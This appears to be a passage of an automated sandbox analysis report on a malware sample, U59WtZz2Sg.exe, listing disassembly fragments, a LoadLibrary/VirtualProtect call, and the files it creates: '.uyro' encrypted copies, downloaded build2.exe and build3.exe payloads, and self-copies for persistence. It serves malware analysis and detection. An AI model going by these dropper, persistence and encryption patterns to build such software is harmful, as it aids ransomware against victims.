Source: Binary string: #C:\gahu\juviru.pdb0f source: U59WtZz2Sg.exe, 00000000.00000000.295248076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000001.00000000.300308286.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000000.308700520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318011527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000004.00000000.310209669.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000004.00000002.344696539.0000000000401000.00000020.00000001.01000000.00000005.sdmp, U59WtZz2Sg.exe, 00000005.00000000.313385446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388604495.0000000003060000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00406619 push ecx; ret 0_2_0040662C
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0218E0AF push ecx; retf 0_2_0218E0B2
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00428565 push ecx; ret 1_2_00428578
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040322F LoadLibraryA,GetProcAddress,VirtualProtect, 0_2_0040322F
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sd-Arab-PK\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\VhdProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\MsiProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-BR\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\eu\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sv\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Latn-RS\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quc\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\vi\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quz-PE\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\te\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IBSProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fi\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sw\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OfflineSetupProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\de\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pt-PT\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ProvProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kn\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sq\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\id\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-BD\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SysprepProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ne-NP\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cy-GB\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hy\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\CR_4BAC1.tmp\setup.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bs-Latn-BA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SmiProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ms\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nn-NO\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca-Es-VALENCIA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ka\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gd\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lt\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Application Data\Application Data\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mi-NZ\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ru\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\OSProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\az-Latn-AZ\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tk-TM\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hr\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\TransmogProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\he\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nb-NO\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ky\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\km-KH\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mt-MT\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build2[1].exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ro\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveStandaloneUpdater.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\tmpCDDA.tmp.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ml-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ja\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ta\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kok\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\be\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy)
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\ImagingProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\is\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\nso-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tg\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\mn\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pl\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\tmpCDDA.tmp
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lb-LU\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\SetupPlatformProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fil-PH\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\it\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tt\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tn-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\th\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\CR_4BAC1.tmp\setup.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ga-IE\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\el\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kk\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\or-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zu-ZA\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\as-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\da\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ar\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ur\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\UnattendProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hi\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uz-Latn-UZ\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-IN\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\es\FileSync.LocalizedResources.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy)
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bg\FileSync.LocalizedResources.dll.mui
